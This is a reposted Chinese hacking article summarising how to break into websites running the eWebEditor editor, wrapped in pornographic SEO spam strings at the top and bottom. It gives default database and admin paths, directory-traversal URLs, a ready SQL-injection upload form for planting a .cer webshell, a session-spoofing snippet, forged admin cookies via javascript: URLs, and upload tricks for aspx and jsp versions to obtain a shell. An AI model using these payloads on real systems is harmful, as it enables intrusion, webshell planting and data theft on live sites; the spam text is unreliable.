精品秘无码一区二区三区老师-精品秘一区二三区免费雷安-精品蜜桃秘一区二区三区-精品蜜桃秘一区二区三区粉嫩-精品蜜桃一区二区三区-精品蜜臀国产aⅴ一区二区三区

LOGO OA教程 ERP教程 模切知識(shí)交流 PMS教程 CRM教程 開(kāi)發(fā)文檔 其他文檔  
 
網(wǎng)站管理員

目前所有ewebeditor版本入侵的漏洞與問(wèn)題總結(jié)

admin
2010年8月13日 10:19 本文熱度 5227

轉(zhuǎn)載請(qǐng)注明Minghacker's


Ewebeditor編輯器目前分為asp,aspx,php,jsp四種程序,各類ewebeditor版本很多,功能強(qiáng)大頗收使用者喜愛(ài),在國(guó)內(nèi)使用極為廣泛。于是像windows一樣被黑客們挖掘出很多漏洞,大家莫急,筆者M(jìn)inghacker總結(jié)前人基礎(chǔ),一一道來(lái)。


對(duì)于目前asp版本的ewebeditor編輯器漏洞主要分為以下7點(diǎn):


默認(rèn),遍歷目錄漏洞,一句話,注入,構(gòu)造,cookie欺騙,社工(踩腳印入侵),


NO1.ewebeditor編輯器一般默認(rèn)數(shù)據(jù)庫(kù)路徑是db/ewebeditor.mdb
默認(rèn)的后臺(tái)路徑是admin_login.asp
建議最好檢測(cè)下admin_style.asp文件是否可以直接訪問(wèn)


舉例:














數(shù)據(jù)庫(kù)SouthidcEditor\Datas\SouthidcEditor.mdb


沒(méi)登陸頁(yè)面。


利用方法:PopUp.asp頁(yè)面?zhèn)鲌D片小馬,nc提交,得shell



NO2.遍歷目錄漏洞(具體如下):
登陸編輯器---上傳文件管理---選擇樣式目錄(隨便選一個(gè)目錄)
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=../../../.. 看到整個(gè)網(wǎng)站文件了
此漏洞危害大大的,絕對(duì)恐怖



NO3.當(dāng)數(shù)據(jù)庫(kù)被管理員修改為asp、asa后綴的時(shí)候,可以插一句話木馬服務(wù)端進(jìn)入數(shù)據(jù)庫(kù),然后一句話木馬客戶端連接拿下webshell



NO4.有的時(shí)候爆了數(shù)據(jù)庫(kù)找不到后臺(tái)地址讓人發(fā)急,其實(shí)可以試試查看樣式表,有沒(méi)別人加入的asp、asa后綴樣式表,也就是雖說(shuō)的踩著腳印入侵。
還有的時(shí)候聰明的管理員也就是加“#”不妨社工試試,我可沒(méi)少占便宜的
例如:db/#ewebeditor.asa、db/#ewebeditor.asp 、db/#ewebeditor.mdb



NO5.注入2.1.6的注入就不多說(shuō)了,如下保存為html文件修改action,直接上傳cer馬


<H1>ewebeditor asp版 2.1.6 上傳漏洞利用程序----</H1><br><br>
<form action="http://127.1/e/upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>




     ewebeditor 5.2 列目錄漏洞


出現(xiàn)漏洞的文件存在于ewebeditor/asp/browse.asp


ASP/Visual Basic代碼
Function GetList()
Dim s_List, s_Url
s_List = ""
Dim oFSO, oUploadFolder, oUploadFiles, oUploadFile, sFileName
'Response.Write sCurrDir
'On Error Resume Next
Set oFSO = Server.CreateObject("Scripting.FileSystemObject")
Set oUploadFolder = oFSO.GetFolder(Server.MapPath(sCurrDir))
'注意一下sCurrDir變量,這個(gè)值等下我們可以用到
If Err.Number>0 Then
s_List = ""
Exit Function
End If


If sDir <> "" Then
If InstrRev(sDir, "/") > 1 Then
s_Url= Left(sDir, InstrRev(sDir, "/") - 1)
Else
s_Url = ""
End If


s_List = s_List & "" & _
"" & _
".." & _
" " & _
""
End If
'Response.Write sDir&"!"&s_List


Dim oSubFolder
For Each oSubFolder In oUploadFolder.SubFolders
'Response.Write oUploadFolder.SubFolders
If sDir = "" Then
s_Url = oSubFolder.Name
Else
s_Url = sDir & "/" & oSubFolder.Name
End If
s_List = s_List & "" & _
"" & _
"" & oSubFolder.Name & "" & _
" " & _
""
Next
'Response.Write s_List


Set oUploadFiles = oUploadFolder.Files


For Each oUploadFile In oUploadFiles
'Response.Write oUploadFile.Name
sFileName = oUploadFile.Name
If CheckValidExt(sFileName) = True Then
'這行讓人有點(diǎn)郁悶,檢測(cè)了所有允許的文件后綴,如不允許就無(wú)法列出,不然就不只列出目錄名和圖片文件了
If sDir = "" Then
s_Url = sContentPath & sFileName
Else
s_Url = sContentPath & sDir & "/" & sFileName
End If


s_List = s_List & "" & _
"" & FileName2Pic(sFileName) & "" & _
"" & sFileName & "" & _
"" & GetSizeUnit(oUploadFile.size) & "" & _
""
End If
Next
Set oUploadFolder = Nothing
Set oUploadFiles = Nothing
'Response.Write Server.HTMLEncode(s_List)&"!"&s_Url


If sDir = "" Then
s_Url = ""
's_Url = "/"
Else
s_Url = "/" & sDir & ""
's_Url = "/" & sDir & "/"
End If


s_List = s_List & ""
s_List = HTML2JS(s_List)
'Response.Write Server.HTMLEncode(s_List)&"!"&s_Url
s_List = "parent.setDirList(""" & s_List & """, """ & s_Url & """)"
GetList = s_List
End Function
'如果沒(méi)有下面這步檢測(cè)的話,應(yīng)該就可以列出目錄中所有的文件了,有點(diǎn)郁悶..現(xiàn)在只能列出允許后綴的文件和目錄名
Function CheckValidExt(s_FileName)
If sAllowExt = "" Then
CheckValidExt = True
Exit Function
End If


Dim i, aExt, sExt
sExt = LCase(Mid(s_FileName, InStrRev(s_FileName, ".") + 1))
CheckValidExt = False
aExt = Split(LCase(sAllowExt), "|")
For i = 0 To UBound(aExt)
If aExt(i) = sExt Then
CheckValidExt = True
Exit Function
End If
Next
End Function
'我們順著代碼往下找,發(fā)現(xiàn)sCurrDir的值是通過(guò)下面的值得到的
Sub InitParam()
sType = UCase(Trim(Request.QueryString("type")))
sStyleName = Trim(Request.QueryString("style"))


Dim i, aStyleConfig, bValidStyle
bValidStyle = False
For i = 1 To Ubound(aStyle)
aStyleConfig = Split(aStyle(i), "|||")
If Lcase(sStyleName) = Lcase(aStyleConfig(0)) Then
bValidStyle = True
Exit For
End If
Next


If bValidStyle = False Then
OutScript("alert('Invalid Style.')")
End If


sBaseUrl = aStyleConfig(19)
'nAllowBrowse = CLng(aStyleConfig(43))
nAllowBrowse = 1


If nAllowBrowse <> 1 Then
OutScript("alert('Do not allow browse!')")
End If


sUploadDir = aStyleConfig(3)
If Left(sUploadDir, 1) <> "/" Then
Select Case sType
Case "REMOTE"
sUploadDir = "../../" & sUploadDir & "Image/"
Case "FILE"
sUploadDir = "../../" & sUploadDir & "Other/"
Case "MEDIA"
sUploadDir = "../../" & sUploadDir & "Media/"
Case "FLASH"
sUploadDir = "../../" & sUploadDir & "Flash/"
Case Else
sUploadDir = "../../" & sUploadDir & "Image/"
End Select
End If
'sUploadDir =sUploadDir &"/"


Select Case sBaseUrl
Case "0"
'sContentPath = aStyleConfig(23)
Select Case sType
Case "REMOTE"
sContentPath = "../" & aStyleConfig(3) & "Image/"
Case "FILE"
sContentPath = "../" & aStyleConfig(3) & "Other/"
Case "MEDIA"
sContentPath = "../" & aStyleConfig(3) & "Media/"
Case "FLASH"
sContentPath = "../" & aStyleConfig(3) & "Flash/"
Case Else
sContentPath = "../" & aStyleConfig(3) & "Image/"
End Select
Case "1"
sContentPath = RelativePath2RootPath(sUploadDir)
Case "2"
sContentPath = RootPath2DomainPath(RelativePath2RootPath(sUploadDir))
End Select


Select Case sType
Case "REMOTE"
sAllowExt = aStyleConfig(10)
Case "FILE"
sAllowExt = aStyleConfig(6)
Case "MEDIA"
sAllowExt = aStyleConfig(9)
Case "FLASH"
sAllowExt = aStyleConfig(7)
Case Else
sAllowExt = aStyleConfig(8)
End Select


sCurrDir = sUploadDir '注意這里,這個(gè)是得到了配置的路徑地址
sDir = Trim(Request("dir")) '得到dir變量
sDir = Replace(sDir, "\", "/") '對(duì)dir變量進(jìn)行過(guò)濾
sDir = Replace(sDir, "../", "")
sDir = Replace(sDir, "./", "")
If sDir <> "" Then
If CheckValidDir(Server.Mappath(sUploadDir & sDir)) = True Then
sCurrDir = sUploadDir & sDir & "/"
'重點(diǎn)就在這里了,看到?jīng)]有,當(dāng)sUploadDir & sDir存在的時(shí)候,sCurrDir就為sUploadDir & sDir的值了
'雖然上面對(duì)sDir進(jìn)行了過(guò)濾,不過(guò)我們完全可以跳過(guò).具體利用st0p會(huì)在下面的利用中給出
Else
sDir = ""
End If
End If


End Sub



嘿嘿,看到這你應(yīng)該明白了,其實(shí)就是對(duì)dir過(guò)濾的問(wèn)題,我們完全可以構(gòu)造特殊的值來(lái)跳過(guò)驗(yàn)證,這樣就可以得到目錄結(jié)構(gòu)和顯示設(shè)置文件中允許的文件后綴的文件了..
利用方法如下
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/..
由于st0p測(cè)試的時(shí)候,上傳目錄是根目錄下的uploadfile,通過(guò)上面的地址就可以得到根目錄下的所有目錄了.
嘿嘿,如果你發(fā)現(xiàn)打開(kāi)的時(shí)候顯示的是空白,不要灰心,這就對(duì)了,直接查看源代碼,看到了嗎,里面就有你根目錄的目錄名字了.
嘿嘿,他根目錄下有個(gè)guest目錄,我們通過(guò)下面的地址可以列出他下面的結(jié)構(gòu)
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/…././/guest
然后我們也可以通過(guò)
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/../…././/..
可以往更上層跳,我測(cè)試的那個(gè)虛擬主機(jī),得到的是www,logfile,datebase這三個(gè)目錄.


   eWebEditorv5.5asp存在session欺騙漏洞!
記得以前eWebEditor在線編輯器有個(gè)session欺騙漏洞沒(méi)想到5.5版本也存在!


代碼如下:


'登錄檢查
Function ChkLogin()
If session("editor_admin")="" or IsNull(session("editor_admin")) Then
     PhilLogin()
   session.CodePage = session("PreCodePage")
   response.End
End If
End Function


呵呵很明顯和以前的版本漏洞一樣!


只是判斷了session.


利用方法:


新建立個(gè)hkok8.asp內(nèi)容為


<%Session("editor_admin") = "admin"%>


然后訪問(wèn)hkok8.asp 最后訪問(wèn)登陸文件.刷新ok進(jìn)去了...


要進(jìn)行這種Session欺騙,必須有三個(gè)前提:


1.進(jìn)行欺騙的網(wǎng)頁(yè)和被欺騙的網(wǎng)頁(yè)必須位于同一個(gè)網(wǎng)站內(nèi).
2.必須知道管理頁(yè)面。
3.必須知道Session變量以及它的限制條件。


    php版ewebeditor 3.8的漏洞


php版本后臺(tái)是調(diào)用../ewebeditor/admin/config.php,大家去看下源碼就知道,在這里我說(shuō)說(shuō)利用方法:


1 首先當(dāng)然要找到登陸后臺(tái),默認(rèn)是../eWebEditor/admin/login.php,進(jìn)入后臺(tái)后隨便輸入一個(gè)用戶和密碼,當(dāng)然會(huì)提示出錯(cuò)了,必須是出錯(cuò)的時(shí)候,然后這時(shí)候你清空瀏覽器的url,然后輸入javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回車,
2 然后輸入正常情況才能訪問(wèn)的文件../ewebeditor/admin/default.php就可以進(jìn)后臺(tái)了


3 后面的利用和asp一樣,新增樣式修改上傳,就ok了


測(cè)試一下asp 2.8版本的,竟然一樣可以用,爽,看來(lái)asp版的應(yīng)該可以通殺(只測(cè)試2.8的,貌似2.8是最高版本的)
aspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在瀏攬器輸入javascript:lbtnUpload.click();就能得到shell
jsp的上傳漏洞以及那個(gè)出了N久了,由于沒(méi)有上傳按鈕,選擇好要上傳的shell,直接回車就可以了


該文章在 2010/8/13 10:19:21 編輯過(guò)
關(guān)鍵字查詢
相關(guān)文章
正在查詢...
點(diǎn)晴ERP是一款針對(duì)中小制造業(yè)的專業(yè)生產(chǎn)管理軟件系統(tǒng),系統(tǒng)成熟度和易用性得到了國(guó)內(nèi)大量中小企業(yè)的青睞。
點(diǎn)晴PMS碼頭管理系統(tǒng)主要針對(duì)港口碼頭集裝箱與散貨日常運(yùn)作、調(diào)度、堆場(chǎng)、車隊(duì)、財(cái)務(wù)費(fèi)用、相關(guān)報(bào)表等業(yè)務(wù)管理,結(jié)合碼頭的業(yè)務(wù)特點(diǎn),圍繞調(diào)度、堆場(chǎng)作業(yè)而開(kāi)發(fā)的。集技術(shù)的先進(jìn)性、管理的有效性于一體,是物流碼頭及其他港口類企業(yè)的高效ERP管理信息系統(tǒng)。
點(diǎn)晴WMS倉(cāng)儲(chǔ)管理系統(tǒng)提供了貨物產(chǎn)品管理,銷售管理,采購(gòu)管理,倉(cāng)儲(chǔ)管理,倉(cāng)庫(kù)管理,保質(zhì)期管理,貨位管理,庫(kù)位管理,生產(chǎn)管理,WMS管理系統(tǒng),標(biāo)簽打印,條形碼,二維碼管理,批號(hào)管理軟件。
點(diǎn)晴免費(fèi)OA是一款軟件和通用服務(wù)都免費(fèi),不限功能、不限時(shí)間、不限用戶的免費(fèi)OA協(xié)同辦公管理系統(tǒng)。
Copyright 2010-2025 ClickSun All Rights Reserved

主站蜘蛛池模板: 日韩一级一欧美一级国产 | 麻豆国内剧果冻传媒视频 | 亚洲午夜精品一级在线播放 | 精品福利视频一区二区三区 | 亚洲精品午夜理论不 | 亚洲av无码成人精品 | 色欲久久九色一区二区三区 | 亚洲国产精品美女久久久久8k | 大屁股熟女一区二区三区 | 亚洲系列无码专区 | 久久久日韩精品一区二区 | 日韩欧美一区二区三区免费看 | 亚洲精品国产专区91在线 | 偷妻之寂寞难奈正片完整版高清在线观看 | 中文字幕av无码一二三区电影 | 久久av无码专区亚洲av桃花岛 | 亚洲v无码成h人在线观看 | 毛片免费视频观看 | 日本熟妇乱人伦A片精品软件 | 国产亚洲精品久久久久久久久 | 人妻无码专用影院 | 国产成人午夜精品55 | 国产热在线99视频在线观看 | 99热久久国产精品这里有 | 色哟哟免费视频播放网站 | 国产午夜精品一区二区在线观看 | 18禁无遮拦无码国产在线播放 | 精品三级在线播放线观看 | 永久免费精品视频网站 | 久久久久久国产一区二区三区 | 国产在线精品一区在线观看 | 亚洲精品无码九九九九九 | 国产免费一区二区三区香蕉精 | 久久亚洲国产成人精品无码区 | 久久久精品日本一区二区三区 | 一本清日本在线视频精品 | 国产偷人爽久久久久久老妇app | 亚洲综合另类一区二区 | 中国少妇内射XXXHD免费 | 国产精品免费无遮挡无码永久视频 | 国产嫖妓在线精品 |